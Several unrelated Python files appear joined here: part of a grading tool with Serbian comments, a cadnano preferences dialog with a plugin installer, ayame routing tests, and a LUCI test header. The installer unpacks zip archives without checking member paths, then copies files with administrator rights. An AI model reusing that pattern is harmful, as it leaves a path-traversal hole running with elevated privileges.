criteria - kriterijum pregleda zadatka (bodovanje, način izvršavanja itd.)
test_name - naziv testa čije se ocenjivanje preuzima
"""
for s in criteria.score_distribution:
if s.keys()[0] == test_name:
return s.values()[0]
# Red koji se koristi za prosleđivanje testova nitima koje se koriste za pokretanje niti:
execution_queue = Queue()
# Rezultati izvršenja testova (niti popunjavaju ovu kolekciju):
execution_results = {}
def do_execute(backend, criteria, ind, execute_dir, executable_file_path, test_index, test_name, report_path):
"""
Funkcija koja obavlja zadatak radne niti za pokretanja testa
backend - back-end koji se trenutno koristi
criteria - kriterijum pregleda zadatka (bodovanje, način izvršavanja itd.)
ind - indeks pokretanja testa (1..N) - za svaki novi test kreće od jedinice
execute_dir - direktorijum u kojem se inicira izvršenje
executable_file_path - relativna putanja do izvršnog fajla (uključujući i njegov naziv) - relativna u odnosu na
execute_dir
test_index - unikatni identifikator pokretanja testa
test_name - naziv testa koji se izvršava
report_path - putanja do fajla sa konzolnim izlazom testa (uključujući i njegov naziv)
Vraća interni format (objekat klase SingleRunResult) o uspešnosti pokretanja
"""
backend.execute_test(test_name, execute_dir, executable_file_path, test_index, report_path)
try:
r = backend.parse_testing_artefacts(test_name, execute_dir, criteria.blocking_tests, test_index)
return r
except RuntimeError as err:
util.fatal_error(err.message)
def execution_worker_thread(backend, criteria, ind, execute_dir, executable_file_path):
"""
Funkcija koju izvršavaju radne niti koje obrađuju pokretanje testova
backend - back-end koji se trenutno koristi
criteria - kriterijum pregleda zadatka (bodovanje, način izvršavanja itd.)
ind - indeks pokretanja testa (1..N) - za svaki novi test kreće od jedinice
execute_dir - direktorijum u kojem se inicira izvršenje
executable_file_path - relativna putanja do izvršnog fajla (uključujući i njegov naziv) - relativna u odnosu na
execute_dir
Red testova koje treba pokrenuti formira se u globalnom redu execution_queue.
Rezultat pokretanja testova se agregira u globalnom dictionary-ju execution_results.
Ključ ovog rečnika je naziv testa, podatak je lista koja sadrži rezime svakog pojedinačnog pokretanja.
"""
logging.debug('Radna nit za pokretanje testova pod indeksom {0} je pokrenuta'.format(ind))
logging.debug('Parametri niti: run_path: "{0}", executable: "{1}"'.format(execute_dir, executable_file_path))
while True:
item = execution_queue.get()
test_index = item[0]
test_name = item[1]
report_path = item[2]
logging.debug('Nit {0} preuzela je test pod indeksom: {1}, naziv testa: {2}'.format(ind, test_index, test_name))
execution_results[test_name][test_index] = do_execute(backend, criteria, ind, execute_dir, executable_file_path,
test_index, test_name, report_path)
execution_queue.task_done()
logging.debug('Nit {0} zavrsila je pokretanje testa'.format(ind))
def filename_matches_assignment_pattern(backend, file):
for m in backend.get_assignment_files_pattern():
if fnmatch.fnmatch(file, m):
return True
return False
def internal_build_project(backend, config, criteria, current_assignment_path, autobuild_path):
"""
Interna pomoćna metoda koja vrši kompajliranje projekta (studentskog zadatka)
backend - back-end koji se trenutno koristi
config - globalna konfiguracija alata za pregled
criteria - kriterijum pregleda zadatka (bodovanje, način izvršavanja itd.)
current_assignment_path - putanja do zadatka koji se kompajlira
autobuild_path - putanja na kojoj se nalazi autobuild varijanta tekućeg zadatka
Vraća indikaciju da li je kompajliranje uspešno obavljeno
0 - kompajliranje je uspešno
1 - produkovan je izvršni fajl ali je kompajliranje vratilo upozorenja
2 - kompajliranje je neuspešno
"""
logging.info('Pokrenuto je kompajliranje projekta u direktorijumu: {0}'.format(current_assignment_path))
# Brisanje trenutnog sadrzaja autobuild direktorijuma:
print('Brisanje sadrzaja direktorijuma "{0}"'.format(autobuild_path))
util.make_sure_path_exists(autobuild_path)
util.clear_directory(autobuild_path)
# Kopiranje svih fajlova iz osnovnog direktorijuma u autobuild poddirektorijum:
print('Kopiranje izvornih fajlova iz "{0}" u "{1}"'.format(current_assignment_path, autobuild_path))
onlyfiles = [f for f in os.listdir(current_assignment_path) if path.isfile(join(current_assignment_path, f))]
autotestfiles = [f for f in os.listdir(config.AUTOTEST_PATH) if path.isfile(join(config.AUTOTEST_PATH, f))]
for f in onlyfiles:
if (f in criteria.assignment_files) or (f not in autotestfiles and filename_matches_assignment_pattern(backend, f)):
copyfile(join(current_assignment_path, f), join(autobuild_path, f))
# Obrada događaja koji se inicira pre nego što se obavi kompajliranje zadatka:
try:
backend.before_build(autobuild_path)
except RuntimeError as err:
util.fatal_error(err.message)
# Kopiranje dodatnih fajlova iz autotest direktorijuma u autobuild poddirektorijum:
print('Kopiranje autotest fajlova iz "{0}" u "{1}"'.format(config.AUTOTEST_PATH, autobuild_path))
if len(autotestfiles) == 0:
util.fatal_error(
'Projekat se ne moze kompajlirati jer autotest varijanta zadatka nije postavljena u direktorijum: "{0}"!'
.format(config.AUTOTEST_PATH))
for f in autotestfiles:
# Proverava se da li je fajl naveden u listi fajlova u kojima studenti unose resenje zadatka.
# Ako je tako, onda taj fajl ne bi smeo da bude postavljen u autotest folder.
if f in criteria.assignment_files:
util.fatal_error('''Fajl "{0}" je postavljen u "{1}" direktorijum a ocekuje se da studenti unose svoje resenje u taj fajl.
Fajlovi iz "{1}" direktorijuma kopiraju se preko studentskog resenja, tako da bi kopiranjem ovog fajla unistili kljucni deo resenja.
Molim da procitate deo uputstva za koriscenje alata za pregled koji se odnosi na postavljanje fajlova u ovaj direktorijum.'''.format(f, config.AUTOTEST_PATH))
copyfile(join(config.AUTOTEST_PATH, f), join(autobuild_path, f))
# Potom, sledi kompajliranje projekta:
ret = backend.build_project(util.identify_project_file(backend, autobuild_path))
# Poslednja linija izvešaja o kompajliranju treba da sadrži informaciju o potencijalnim upozorenjima i greškama tokom kompajliranja:
f = open(join(autobuild_path, backend.get_build_report_filename()), 'r')
lines = f.readlines()
last_line = lines[len(lines)-1]
regex = re.compile('(?P<errors>\d+)\serror\(s\),\s(?P<warnings>\d+)\swarning\(s\)', re.IGNORECASE)
m = regex.match(last_line)
if m:
errors = int(m.group('errors'))
warnings = int(m.group('warnings'))
if (errors == 0 and warnings == 0):
return 0
if (errors == 0):
return 1
return 2
else:
util.fatal_error('''Interna greska: izvestaj o kompajliranju ne sadrzi poslednju liniju sa brojem gresaka i upozorenja.
Nije moguce utvrditi ishod kompajliranja. Potrebno je kontaktirati autora alata.''')
def vm_build_error(build_report_path):
"""
Ispituje da li je greška u kompajliranju posledica problema sa Code::Blocks okruženjem
build_report_path - putanja do izveštaja o kompajliranju projekta
"""
f = open(build_report_path, 'r')
text = f.read()
regex = re.compile('^virtual memory exhausted', re.MULTILINE | re.IGNORECASE)
m = regex.search(text)
return not m is None |
from ui.dialogs.ui_preferences import Ui_Preferences
from views import styles
import util
import cadnano
import os.path, zipfile, shutil, platform, subprocess, tempfile, errno
util.qtWrapImport('QtCore', globals(), ['QObject', 'QSettings', 'pyqtSlot', 'Qt'])
util.qtWrapImport('QtWidgets', globals(), ['QWidget', 'QDialogButtonBox',
'QTableWidgetItem', 'QFileDialog',
'QMessageBox'])
class Preferences(object):
"""docstring for Preferences"""
def __init__(self):
self.qs = QSettings()
self.uiPrefs = Ui_Preferences()
self.widget = QWidget()
self.uiPrefs.setupUi(self.widget)
self.readPreferences()
self.widget.addAction(self.uiPrefs.actionClose)
self.uiPrefs.actionClose.triggered.connect(self.hideDialog)
self.uiPrefs.honeycombRowsSpinBox.valueChanged.connect(self.setHoneycombRows)
self.uiPrefs.honeycombColsSpinBox.valueChanged.connect(self.setHoneycombCols)
self.uiPrefs.honeycombStepsSpinBox.valueChanged.connect(self.setHoneycombSteps)
self.uiPrefs.squareRowsSpinBox.valueChanged.connect(self.setSquareRows)
self.uiPrefs.squareColsSpinBox.valueChanged.connect(self.setSquareCols)
self.uiPrefs.squareStepsSpinBox.valueChanged.connect(self.setSquareSteps)
self.uiPrefs.autoScafComboBox.currentIndexChanged.connect(self.setAutoScaf)
self.uiPrefs.defaultToolComboBox.currentIndexChanged.connect(self.setStartupTool)
self.uiPrefs.zoomSpeedSlider.valueChanged.connect(self.setZoomSpeed)
# self.uiPrefs.helixAddCheckBox.toggled.connect(self.setZoomToFitOnHelixAddition)
self.uiPrefs.buttonBox.clicked.connect(self.handleButtonClick)
self.uiPrefs.addPluginButton.clicked.connect(self.addPlugin)
def showDialog(self):
# self.exec_()
self.readPreferences()
self.widget.show() # launch prefs in mode-less dialog
def hideDialog(self):
self.widget.hide()
# @pyqtSlot(object)
def handleButtonClick(self, button):
"""
Restores defaults. Other buttons are ignored because connections
are already set up in qt designer.
"""
if self.uiPrefs.buttonBox.buttonRole(button) == QDialogButtonBox.ResetRole:
self.restoreDefaults()
def readPreferences(self):
self.qs.beginGroup("Preferences")
self.honeycombRows = self.qs.value("honeycombRows", styles.HONEYCOMB_PART_MAXROWS)
self.honeycombCols = self.qs.value("honeycombCols", styles.HONEYCOMB_PART_MAXCOLS)
self.honeycombSteps = self.qs.value("honeycombSteps", styles.HONEYCOMB_PART_MAXSTEPS)
self.squareRows = self.qs.value("squareRows", styles.SQUARE_PART_MAXROWS)
self.squareCols = self.qs.value("squareCols", styles.SQUARE_PART_MAXCOLS)
self.squareSteps = self.qs.value("squareSteps", styles.SQUARE_PART_MAXSTEPS)
self.autoScafIndex = self.qs.value("autoScaf", styles.PREF_AUTOSCAF_INDEX)
self.startupToolIndex = self.qs.value("startupTool", styles.PREF_STARTUP_TOOL_INDEX)
self.zoomSpeed = self.qs.value("zoomSpeed", styles.PREF_ZOOM_SPEED)
self.zoomOnHelixAdd = self.qs.value("zoomOnHelixAdd", styles.PREF_ZOOM_AFTER_HELIX_ADD)
self.qs.endGroup()
self.uiPrefs.honeycombRowsSpinBox.setProperty("value", self.honeycombRows)
self.uiPrefs.honeycombColsSpinBox.setProperty("value", self.honeycombCols)
self.uiPrefs.honeycombStepsSpinBox.setProperty("value", self.honeycombSteps)
self.uiPrefs.squareRowsSpinBox.setProperty("value", self.squareRows)
self.uiPrefs.squareColsSpinBox.setProperty("value", self.squareCols)
self.uiPrefs.squareStepsSpinBox.setProperty("value", self.squareSteps)
self.uiPrefs.autoScafComboBox.setCurrentIndex(self.autoScafIndex)
self.uiPrefs.defaultToolComboBox.setCurrentIndex(self.startupToolIndex)
self.uiPrefs.zoomSpeedSlider.setProperty("value", self.zoomSpeed)
ptw = self.uiPrefs.pluginTableWidget
loadedPluginPaths = list(cadnano.loadedPlugins.keys())
ptw.setRowCount(len(loadedPluginPaths))
for i in range(len(loadedPluginPaths)):
row = QTableWidgetItem(loadedPluginPaths[i])
row.setFlags(Qt.ItemIsEnabled | Qt.ItemIsSelectable)
ptw.setItem(i, 0, row)
# self.uiPrefs.helixAddCheckBox.setChecked(self.zoomOnHelixAdd)
def restoreDefaults(self):
self.uiPrefs.honeycombRowsSpinBox.setProperty("value", styles.HONEYCOMB_PART_MAXROWS)
self.uiPrefs.honeycombColsSpinBox.setProperty("value", styles.HONEYCOMB_PART_MAXCOLS)
self.uiPrefs.honeycombStepsSpinBox.setProperty("value", styles.HONEYCOMB_PART_MAXSTEPS)
self.uiPrefs.squareRowsSpinBox.setProperty("value", styles.SQUARE_PART_MAXROWS)
self.uiPrefs.squareColsSpinBox.setProperty("value", styles.SQUARE_PART_MAXCOLS)
self.uiPrefs.squareStepsSpinBox.setProperty("value", styles.SQUARE_PART_MAXSTEPS)
self.uiPrefs.autoScafComboBox.setCurrentIndex(styles.PREF_AUTOSCAF_INDEX)
self.uiPrefs.defaultToolComboBox.setCurrentIndex(styles.PREF_STARTUP_TOOL_INDEX)
self.uiPrefs.zoomSpeedSlider.setProperty("value", styles.PREF_ZOOM_SPEED)
# self.uiPrefs.helixAddCheckBox.setChecked(styles.PREF_ZOOM_AFTER_HELIX_ADD)
def setHoneycombRows(self, rows):
self.honeycombRows = rows
self.qs.beginGroup("Preferences")
self.qs.setValue("honeycombRows", self.honeycombRows)
self.qs.endGroup()
def setHoneycombCols(self, cols):
self.honeycombCols = cols
self.qs.beginGroup("Preferences")
self.qs.setValue("honeycombCols", self.honeycombCols)
self.qs.endGroup()
def setHoneycombSteps(self, steps):
self.honeycombSteps = steps
self.qs.beginGroup("Preferences")
self.qs.setValue("honeycombSteps", self.honeycombSteps)
self.qs.endGroup()
def setSquareRows(self, rows):
self.squareRows = rows
self.qs.beginGroup("Preferences")
self.qs.setValue("squareRows", self.squareRows)
self.qs.endGroup()
def setSquareCols(self, cols):
self.squareCols = cols
self.qs.beginGroup("Preferences")
self.qs.setValue("squareCols", self.squareCols)
self.qs.endGroup()
def setSquareSteps(self, steps):
self.squareSteps = steps
self.qs.beginGroup("Preferences")
self.qs.setValue("squareSteps", self.squareSteps)
self.qs.endGroup()
def setAutoScaf(self, index):
self.autoScafIndex = index
self.qs.beginGroup("Preferences")
self.qs.setValue("autoScaf", self.autoScafIndex)
self.qs.endGroup()
def setStartupTool(self, index):
self.startupToolIndex = index
self.qs.beginGroup("Preferences")
self.qs.setValue("startupTool", self.startupToolIndex)
self.qs.endGroup()
def setZoomSpeed(self, speed):
self.zoomSpeed = speed
self.qs.beginGroup("Preferences")
self.qs.setValue("zoomSpeed", self.zoomSpeed)
self.qs.endGroup()
# def setZoomToFitOnHelixAddition(self, checked):
# self.zoomOnHelixAdd = checked
# self.qs.beginGroup("Preferences")
# self.qs.setValue("zoomOnHelixAdd", self.zoomOnHelixAdd)
# self.qs.endGroup()
def getAutoScafType(self):
return ['Mid-seam', 'Raster'][self.autoScafIndex]
def getStartupToolName(self):
return ['Select', 'Pencil', 'Paint', 'AddSeq'][self.startupToolIndex]
def addPlugin(self):
fdialog = QFileDialog(
self.widget,
"Install Plugin",
cadnano.path(),
"Cadnano Plugins (*.cnp)")
fdialog.setAcceptMode(QFileDialog.AcceptOpen)
fdialog.setWindowFlags(Qt.Sheet)
fdialog.setWindowModality(Qt.WindowModal)
fdialog.filesSelected.connect(self.addPluginAtPath)
self.fileopendialog = fdialog
fdialog.open()
def addPluginAtPath(self, fname):
self.fileopendialog.close()
fname = str(fname[0])
print("Attempting to open plugin %s"%fname)
try:
zf = zipfile.ZipFile(fname, 'r')
except Exception as e:
self.failWithMsg("Plugin file seems corrupt: %s."%e)
return
tdir = tempfile.mkdtemp()
try:
for f in zf.namelist():
if f.endswith('/'):
os.makedirs(os.path.join(tdir,f))
for f in zf.namelist():
if not f.endswith('/'):
zf.extract(f, tdir)
except Exception as e:
self.failWithMsg("Extraction of plugin archive failed: %s."%e)
return
filesInZip = [(f, os.path.join(tdir, f)) for f in os.listdir(tdir)]
try:
self.confirmDestructiveIfNecessary(filesInZip)
self.removePluginsToBeOverwritten(filesInZip)
self.movePluginsIntoPluginsFolder(filesInZip)
except OSError:
print("Couldn't copy files into plugin directory, attempting\
again after boosting privileges.")
if platform.system() == 'Darwin':
self.darwinAuthedMvPluginsIntoPluginsFolder(filesInZip)
elif platform.system() == 'Linux':
self.linuxAuthedMvPluginsIntoPluginsFolder(filesInZip)
else:
print("Can't boost privelages on platform %s"%platform.system())
loadedAPlugin = cadnano.loadAllPlugins()
if not loadedAPlugin:
print("Unable to load anythng from plugin %s"%fname)
self.readPreferences()
shutil.rmtree(tdir)
def darwinAuthedMvPluginsIntoPluginsFolder(self, filesInZip):
envirn={"DST":cadnano.path()+'/plugins'}
srcstr = ''
for i in range(len(filesInZip)):
fileName, filePath = filesInZip[i]
srcstr += ' \\"$SRC' + str(i) + '\\"'
envirn['SRC'+str(i)] = filePath
proc = subprocess.Popen(['osascript','-e',\
'do shell script "cp -fR ' + srcstr +\
' \\"$DST\\"" with administrator privileges'],\
env=envirn)
retval = self.waitForProcExit(proc)
if retval != 0:
self.failWithMsg('cp failed with code %i'%retval)
def linuxAuthedMvPluginsIntoPluginsFolder(self, filesInZip):
args = ['gksudo', 'cp', '-fR']
args.extend(filePath for fileName, filePath in filesInZip)
args.append(cadnano.path()+'/plugins')
proc = subprocess.Popen(args)
retval = self.waitForProcExit(proc)
if retval != 0:
self.failWithMsg('cp failed with code %i'%retval)
def confirmDestructiveIfNecessary(self, filesInZip):
for fileName, filePath in filesInZip:
target = os.path.join(cadnano.path(), 'plugins', fileName)
if os.path.isfile(target):
return self.confirmDestructive()
elif os.path.isdir(target):
return self.confirmDestructive()
def confirmDestructive(self):
mb = QMessageBox(self.widget)
mb.setIcon(QMessageBox.Warning)
mb.setInformativeText("The plugin you are trying to install\
has already been installed. Replace the currently installed one?")
mb.setStandardButtons(QMessageBox.No | QMessageBox.Yes)
mb.exec_()
return mb.clickedButton() == mb.button(QMessageBox.Yes)
def removePluginsToBeOverwritten(self, filesInZip):
for fileName, filePath in filesInZip:
target = os.path.join(cadnano.path(), 'plugins', fileName)
if os.path.isfile(target):
os.unlink(target)
elif os.path.isdir(target):
shutil.rmtree(target)
def movePluginsIntoPluginsFolder(self, filesInZip):
for fileName, filePath in filesInZip:
target = os.path.join(cadnano.path(), 'plugins', fileName)
shutil.move(filePath, target)
def waitForProcExit(self, proc):
procexit = False
while not procexit:
try:
retval = proc.wait()
procexit = True
except OSError as e:
if e.errno != errno.EINTR:
raise ose
return retval
def failWithMsg(self, str):
mb = QMessageBox(self.widget)
mb.setIcon(QMessageBox.Warning)
mb.setInformativeText(str)
mb.buttonClicked.connect(self.closeFailDialog)
self.failMessageBox = mb
mb.open()
def closeFailDialog(self, button):
self.failMessageBox.close()
del self.failMessageBox |
#
# test_route
#
# Copyright (c) 2011-2021 <NAME> <<EMAIL>>
#
# SPDX-License-Identifier: MIT
#
import ayame
from ayame import http, route
from base import AyameTestCase
class RouteTestCase(AyameTestCase):
def test_static_rules(self):
map = route.Map()
map.connect('/', 0)
map.connect('/news', 1, methods=['GET', 'HEAD'])
# GET /
router = map.bind(self.new_environ(path='/'))
self.assertEqual(router.match(), (0, {}))
# GET /?a=1
router = map.bind(self.new_environ(path='/', query='a=1'))
self.assertEqual(router.match(), (0, {}))
# GET (empty path info) -> MovedPermanently
router = map.bind(self.new_environ(path=''))
with self.assertRaises(http.MovedPermanently) as cm:
router.match()
self.assertEqual(cm.exception.headers, [
('Location', 'http://localhost/'),
])
# HEAD / -> NotImplemented
router = map.bind(self.new_environ(method='HEAD', path='/'))
with self.assertRaises(http.NotImplemented) as cm:
router.match()
self.assertEqual(cm.exception.headers, [])
# GET /news
router = map.bind(self.new_environ(path='/news'))
self.assertEqual(router.match(), (1, {}))
# PUT /news -> NotImplemented
router = map.bind(self.new_environ(method='PUT', path='/news'))
with self.assertRaises(http.NotImplemented):
router.match()
# GET /404 -> NotFound
router = map.bind(self.new_environ(path='/404'))
with self.assertRaises(http.NotFound):
router.match()
# build URI
router = map.bind(self.new_environ(path='/'))
with self.assertRaises(ayame.RouteError):
router.build(-1)
with self.assertRaises(ayame.RouteError):
router.build(0, method='PUT')
self.assertEqual(router.build(0),
'/')
self.assertEqual(router.build(0, {'a': ['1']}, query=False),
'/')
self.assertEqual(router.build(0, {'a': ['1']}),
'/?a=1')
self.assertEqual(router.build(0, {'a': ['1']}, 'ch1'),
'/?a=1#ch1')
self.assertEqual(router.build(0, anchor='ch1'),
'/#ch1')
self.assertEqual(router.build(0, {'a': 1}),
'/?a=1')
self.assertEqual(router.build(0, {'a': '1'}),
'/?a=1')
self.assertEqual(router.build(0, {'a': [1]}),
'/?a=1')
self.assertEqual(router.build(0, {'a': (1,)}),
'/?a=1')
self.assertEqual(router.build(0, {'a': ['1']}),
'/?a=1')
self.assertEqual(router.build(0, {'a': ('1',)}),
'/?a=1')
self.assertEqual(router.build(0, {'a': ''}),
'/?a=')
self.assertEqual(router.build(0, {'a': 1, 'z': 3, 'm': 2}),
'/?a=1&m=2&z=3')
self.assertEqual(router.build(0, {'a': [3, 2, 1]}),
'/?a=3&a=2&a=1')
map.sort_key = lambda o: -ord(o[0])
self.assertEqual(router.build(0, {'a': 1, 'z': [3, 2], 'm': [1, 2]}),
'/?z=3&z=2&m=1&m=2&a=1')
# build URI (without SCRIPT_NAME)
environ = self.new_environ(path='/')
environ['SCRIPT_NAME'] = '/ayame'
router = map.bind(environ)
self.assertEqual(router.build(0), '/ayame/')
self.assertEqual(router.build(0, relative=True), '/')
def test_no_static(self):
map = route.Map()
map.connect('<a>', 0)
router = map.bind(self.new_environ(path='app'))
self.assertEqual(router.match(), (0, {'a': 'app'}))
def test_duplicate_variable(self):
map = route.Map()
with self.assertRaisesRegex(ayame.RouteError, r"'a' already in use$"):
map.connect('/<a>/<b>/<a>/<c>', 0)
def test_unknown_converter(self):
map = route.Map()
with self.assertRaisesRegex(ayame.RouteError, r" 'spam' not found$"):
map.connect('/<a:spam>', 0)
def test_custom_converter(self):
class SpamConverter(route.Converter):
pass
map = route.Map(converters={'spam': SpamConverter})
map.connect('/<a:spam>', 0)
router = map.bind(self.new_environ(path='/app'))
self.assertEqual(router.match(), (0, {'a': 'app'}))
def test_int_converter(self):
map = route.Map()
map.connect('/<y:int>/', 0)
map.connect('/<y:int>/<m:int(2, min=1, max=12)>/', 1)
map.connect('/_/<a:int(2)>/', 2)
# GET /2011 -> MovedPermanently
router = map.bind(self.new_environ(path='/2011'))
with self.assertRaises(http.MovedPermanently) as cm:
router.match()
self.assertEqual(cm.exception.headers, [
('Location', 'http://localhost/2011/'),
])
# GET /2011/
router = map.bind(self.new_environ(path='/2011/'))
self.assertEqual(router.match(), (0, {'y': 2011}))
# GET /0/
router = map.bind(self.new_environ(path='/0/'))
self.assertEqual(router.match(), (0, {'y': 0}))
# GET /2011/01 -> MovedPermanently
router = map.bind(self.new_environ(path='/2011/01'))
with self.assertRaises(http.MovedPermanently) as cm:
router.match()
self.assertEqual(cm.exception.headers, [
('Location', 'http://localhost/2011/01/'),
])
# GET /2011/01/
router = map.bind(self.new_environ(path='/2011/01/'))
self.assertEqual(router.match(), (1, {'y': 2011, 'm': 1}))
# GET /2011/12/
router = map.bind(self.new_environ(path='/2011/12/'))
self.assertEqual(router.match(), (1, {'y': 2011, 'm': 12}))
# GET /2011/1/ -> NotFound
router = map.bind(self.new_environ(path='/2011/1/'))
with self.assertRaises(http.NotFound):
router.match()
# GET /2011/100/ -> NotFound
router = map.bind(self.new_environ(path='/2011/100/'))
with self.assertRaises(http.NotFound):
router.match()
# GET /2011/00/ -> NotFound
router = map.bind(self.new_environ(path='/2011/00/'))
with self.assertRaises(http.NotFound):
router.match()
# GET /2011/13/ -> NotFound
router = map.bind(self.new_environ(path='/2011/13/'))
with self.assertRaises(http.NotFound):
router.match()
# build URI
router = map.bind(self.new_environ(path='/'))
with self.assertRaises(ayame.RouteError):
router.build(-1)
with self.assertRaises(ayame.RouteError):
router.build(0)
with self.assertRaises(ayame.RouteError):
router.build(0, {'y': None})
with self.assertRaises(ayame.RouteError):
router.build(0, {'y': 'a'})
self.assertEqual(router.build(0, {'y': [2011]}),
'/2011/')
self.assertEqual(router.build(0, {'y': ['2011']}),
'/2011/')
self.assertEqual(router.build(0, {'y': 2011}),
'/2011/')
self.assertEqual(router.build(0, {'y': '2011'}),
'/2011/')
self.assertEqual(router.build(0, {'y': ['2010', '2011']}),
'/2010/?y=2011')
self.assertEqual(router.build(0, {'y': ['2010', '2011']}, query=False),
'/2010/')
with self.assertRaises(ayame.RouteError):
router.build(1)
with self.assertRaises(ayame.RouteError):
router.build(1, {'y': 2011, 'm': 0})
with self.assertRaises(ayame.RouteError):
router.build(1, {'y': 2011, 'm': 13})
with self.assertRaises(ayame.RouteError):
router.build(1, {'y': 2011, 'm': 100})
self.assertEqual(router.build(1, {'y': 2011, 'm': 1}), '/2011/01/')
self.assertEqual(router.build(1, {'y': 2011, 'm': 12}), '/2011/12/')
with self.assertRaises(ayame.RouteError):
router.build(2, {'a': 100})
def test_string_converter(self):
map = route.Map()
map.connect('/<s:string(2)>/', 0)
map.connect('/<s:string(3, min=3)>/', 1)
map.connect('/<s:string>/', 2)
# GET /jp -> MovedPermanently
router = map.bind(self.new_environ(path='/jp'))
with self.assertRaises(http.MovedPermanently):
router.match()
# GET /jp/
router = map.bind(self.new_environ(path='/jp/'))
self.assertEqual(router.match(), (0, {'s': 'jp'}))
# GET /jpy -> MovedPermanently
router = map.bind(self.new_environ(path='/jpy'))
with self.assertRaises(http.MovedPermanently):
router.match()
# GET /jpy/
router = map.bind(self.new_environ(path='/jpy/'))
self.assertEqual(router.match(), (1, {'s': 'jpy'}))
# GET /news -> MovedPermanently
router = map.bind(self.new_environ(path='/news'))
with self.assertRaises(http.MovedPermanently):
router.match()
# GET /news/
router = map.bind(self.new_environ(path='/news/'))
self.assertEqual(router.match(), (2, {'s': 'news'}))
# build URI
router = map.bind(self.new_environ(path='/'))
with self.assertRaises(ayame.RouteError):
router.build(-1)
with self.assertRaises(ayame.RouteError):
router.build(0)
with self.assertRaises(ayame.RouteError):
router.build(0, {'s': None})
with self.assertRaises(ayame.RouteError):
router.build(0, {'s': ''})
with self.assertRaises(ayame.RouteError):
router.build(0, {'s': 'abc'})
self.assertEqual(router.build(0, {'s': 'jp'}), '/jp/')
self.assertEqual(router.build(0, {'s': 'us'}), '/us/')
with self.assertRaises(ayame.RouteError):
router.build(1)
with self.assertRaises(ayame.RouteError):
router.build(1, {'s': None})
with self.assertRaises(ayame.RouteError):
router.build(1, {'s': ''})
with self.assertRaises(ayame.RouteError):
router.build(1, {'s': 'ab'})
with self.assertRaises(ayame.RouteError):
router.build(1, {'s': 'abcd'})
self.assertEqual(router.build(1, {'s': 'jpy'}), '/jpy/')
self.assertEqual(router.build(1, {'s': 'usd'}), '/usd/')
def test_path_converter(self):
map = route.Map()
map.connect('/<p:path>/<m>', 0)
map.connect('/<p:path>', 1)
# GET /WikiPage/edit
router = map.bind(self.new_environ(path='/WikiPage/edit'))
self.assertEqual(router.match(), (0, {'p': 'WikiPage', 'm': 'edit'}))
# GET /WikiPage/edit/
router = map.bind(self.new_environ(path='/WikiPage/edit/'))
self.assertEqual(router.match(), (0, {'p': 'WikiPage', 'm': 'edit'}))
# GET /WikiPage
router = map.bind(self.new_environ(path='/WikiPage'))
self.assertEqual(router.match(), (1, {'p': 'WikiPage'}))
# GET /WikiPage/
router = map.bind(self.new_environ(path='/WikiPage/'))
self.assertEqual(router.match(), (1, {'p': 'WikiPage'}))
# build URI
router = map.bind(self.new_environ(path='/'))
with self.assertRaises(ayame.RouteError):
router.build(-1)
with self.assertRaises(ayame.RouteError):
router.build(0)
with self.assertRaises(ayame.RouteError):
router.build(0, {'p': None})
with self.assertRaises(ayame.RouteError):
router.build(0, {'p': ''})
self.assertEqual(router.build(0, {'p': 'WikiPage', 'm': 'edit'}),
'/WikiPage/edit')
self.assertEqual(router.build(0, {'p': 'WikiPage', 'm': 'delete'}),
'/WikiPage/delete')
self.assertEqual(router.build(0, {'p': '', 'm': ''}),
'//')
with self.assertRaises(ayame.RouteError):
router.build(1)
self.assertEqual(router.build(1, {'p': 'WikiPage'}), '/WikiPage')
self.assertEqual(router.build(1, {'p': ''}), '/')
def test_redirect(self):
map = route.Map()
map.redirect('/<y:int>/<m:int(2, min=1, max=12)>/', '/_/<y>/<m>/')
map.redirect('/<s:string(2)>/', lambda s: f'/_/{s}/')
# GET /2011/01/ -> MovedPermanently
router = map.bind(self.new_environ(path='/2011/01/'))
with self.assertRaises(http.MovedPermanently) as cm:
router.match()
self.assertEqual(cm.exception.headers, [
('Location', 'http://localhost/_/2011/01/'),
])
# GET /jp/ -> MovedPermanently
router = map.bind(self.new_environ(path='/jp/'))
with self.assertRaises(http.MovedPermanently) as cm:
router.match()
self.assertEqual(cm.exception.headers, [
('Location', 'http://localhost/_/jp/'),
])
def test_add_rule(self):
rule = route.Rule('/', 0)
map = route.Map()
map.add(rule)
with self.assertRaises(ayame.RouteError):
map.add(rule)
def test_mount(self):
map = route.Map()
submap = map.mount('/_')
submap.connect('/', 0)
submap.redirect('/old', '/_/new')
submap.add(route.Rule('/news/', 1))
# GET /_/
router = map.bind(self.new_environ(path='/_/'))
self.assertEqual(router.match(), (0, {}))
# GET /_/news/
router = map.bind(self.new_environ(path='/_/news/'))
self.assertEqual(router.match(), (1, {}))
# GET /_/old -> MovedPermanently
router = map.bind(self.new_environ(path='/_/old'))
with self.assertRaises(http.MovedPermanently) as cm:
router.match()
self.assertEqual(cm.exception.headers, [
('Location', 'http://localhost/_/new'),
])
def test_parse_args(self):
rule = route.Rule('/', 1)
self.assertEqual(rule._parse_args(''), ((), {}))
self.assertEqual(rule._parse_args(' '), ((), {}))
self.assertEqual(rule._parse_args(' , '), ((), {}))
self.assertEqual(rule._parse_args('None, True, False'),
((None, True, False), {}))
self.assertEqual(rule._parse_args('0, 1, 0b10, 0o10, 0x10'),
((0, 1, 2, 8, 16), {}))
self.assertEqual(rule._parse_args('0, -1, -0b10, -0o10, -0x10'),
((0, -1, -2, -8, -16), {}))
self.assertEqual(rule._parse_args('3.14, 10., .001, 1e100, 3.14e-10, 0e0'),
((3.14, 10.0, 0.001, 1e+100, 3.14e-10, 0.0), {}))
self.assertEqual(rule._parse_args(r'"spam", "eggs\"ham", "toast\\"'),
(('spam', 'eggs"ham', r'toast\\'), {}))
self.assertEqual(rule._parse_args('0, spam=1'), ((0,), {'spam': 1}))
self.assertEqual(rule._parse_args('0, spam = 1'), ((0,), {'spam': 1}))
with self.assertRaises(SyntaxError):
rule._parse_args('0, 1 2, 3')
with self.assertRaises(SyntaxError):
rule._parse_args('0, spam=1, 2')
with self.assertRaises(SyntaxError):
rule._parse_args('0, spam=1, spam=2')
with self.assertRaises(SyntaxError):
rule._parse_args(r'"spam\\"eggs"')
with self.assertRaises(SyntaxError):
rule._parse_args(r'"spam\"')
|
#!/usr/bin/env python
# Copyright 2014 The LUCI Authors. All rights reserved.
# Use of this source code is governed under the Apache License, Version 2.0
# that can be found in the LICENSE file.
import sys
import unittest
from test_support import test_env
test_env.setup_test_env()
from google.appengine.ext import ndb
from components.datastore_utils import monotonic
from components.datastore_utils import txn
from test_support import test_case
# Access to a protected member _XX of a client class - pylint: disable=W0212
